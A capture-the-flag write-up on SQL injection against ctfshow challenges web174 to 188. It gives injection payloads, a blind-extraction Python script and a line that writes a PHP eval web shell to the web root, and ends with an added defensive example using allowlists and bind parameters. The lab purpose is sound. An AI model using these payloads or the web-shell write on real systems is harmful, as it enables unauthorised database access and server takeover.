Scattered Notes on SQL Injection

admin · 2022-01-05 22:56:05 · CTF section


hdxw

Written up as far as I got.

web174

0' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'g','9'),'0','h'),'1','i'),'2','j'),'3','k'),'4','l'),'5','m'),'6','n'),'7','o'),'8','p'),'9','q') from ctfshow_user4 where username='flag' %23

flaq{khhefafn-mnnb-lbfn-picc-hnledpbohekq}
flag{300efaf6-566b-4bf6-81cc-064ed8b70e39}

0' union select 1,'<?php eval($_POST["5"]);?>' into outfile '/var/www/html/eval.php' %23

The input is not filtered, only the output is, so blind injection works in every case.

web176

I don't know why this works.

0' or 1%23

web177/web178/web179

Spaces do not seem to be allowed.

1'||1%23

web180/web181

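1'    Error, which shows the single quote is usable
1'%23    No data, which shows # is blocked; the other comment terminators do not work either
1'||'1    So skip the bypass and close the quote directly, but the result is cut down by limit 1
0'||username='flag   Change which row is returned and get the flag directly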

web182

0'||substr(username,1,1)='f
0'||username<'g'%26%26username>'f
0'||username<'flah'%26%26username>'flaf
0'||id='26

web183-188

import requests

flag = ""
for i in range(len(flag)+1,50):
    llll = len(flag)
    for s in "0123456789-abcdefgl{}":
        # {'tableName':"`ctfshow_user`where`id`>21&&!(mid(pass,%s,1)<>'%s')"%(i,s)} // user_count = 1;
        # {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,1)<>char(%s))"%(i,ord(s))} //user_count = 42; or possibly ASCII
        # {'tableName':"ctfshow_user a join ctfshow_user b on !(a.id<>b.id) ^ !(mid(a.pass,%s,length(database())/length(database()))<>char(%s))"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} //user_count = 42;
        # {'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])} // "user_count = 484;" not in
        # md5($_POST['password'],true); admin/e58
        # username/0 or 1||1
        r = requests.post("http://b75c1072-6b76-4d93-9787-5a3aa91db533.chall.ctf.show/select-waf.php",data={'tableName':"ctfshow_user a join ctfshow_user b on ascii(mid(a.pass,%s,length(database())/length(database())))-(%s)"%((i*'+length(database())/length(database())')[1:],(ord(s)*'+length(database())/length(database())')[1:])})
        t = r.text
        # print(t)
        if "user_count = 484;" not in t:
            flag += s
            print(flag)
            break
    # break
    if "}" in flag or llll == len(flag):
        break
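
The defensive side of the web180-188 notes, as an added example that is not part of the original post: a character blocklist in front of a concatenated table name still leaks through the row count, while an identifier allowlist and bind parameters do not. It assumes SQLite in place of the challenge's MySQL; the blocklist, the sample rows and the function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """In-memory SQLite database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ctfshow_user (id INTEGER, username TEXT, pass TEXT)")
    db.executemany("INSERT INTO ctfshow_user VALUES (?, ?, ?)",
                   [(1, "alice", "pw1"), (2, "flag", "flag{constructed}")])
    return db

# Hypothetical blocklist (an assumption; the page does not show the real filter).
BLOCKED = re.compile(r"\s|=|#|--|;")

def count_blocklist(db, table_name):
    """Weak: reject some characters, then concatenate into the FROM clause."""
    if BLOCKED.search(table_name):
        return None
    return db.execute("SELECT count(*) FROM " + table_name).fetchone()[0]

ALLOWED_TABLES = {"ctfshow_user"}

def count_allowlist(db, table_name):
    """Hardened: identifiers cannot be bound, so accept only known table names."""
    if table_name not in ALLOWED_TABLES:
        raise ValueError("unknown table name")
    return db.execute(f'SELECT count(*) FROM "{table_name}"').fetchone()[0]

def find_user(db, username):
    """Hardened: values go through a bind parameter, never into the SQL text."""
    cur = db.execute("SELECT id, username FROM ctfshow_user WHERE username = ?",
                     (username,))
    return cur.fetchall()

# Input in the style of the page's tableName payloads: no spaces, no '='.
PAGE_STYLE_INPUT = "`ctfshow_user`where(substr(pass,1,1)<>'f')"

if __name__ == "__main__":
    db = make_db()
    print(count_blocklist(db, "ctfshow_user"))    # baseline row count
    print(count_blocklist(db, PAGE_STYLE_INPUT))  # count shifts: filter bypassed
    try:
        count_allowlist(db, PAGE_STYLE_INPUT)
    except ValueError as exc:
        print("rejected:", exc)
    print(find_user(db, "0'||username='flag"))    # treated as a literal string
```

A response whose row count differs from the baseline for the same endpoint is the signal the script above keys on, so it is also the one worth alerting on.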

Source (CN-SEC): http://cn-sec.com/archives/719565.html
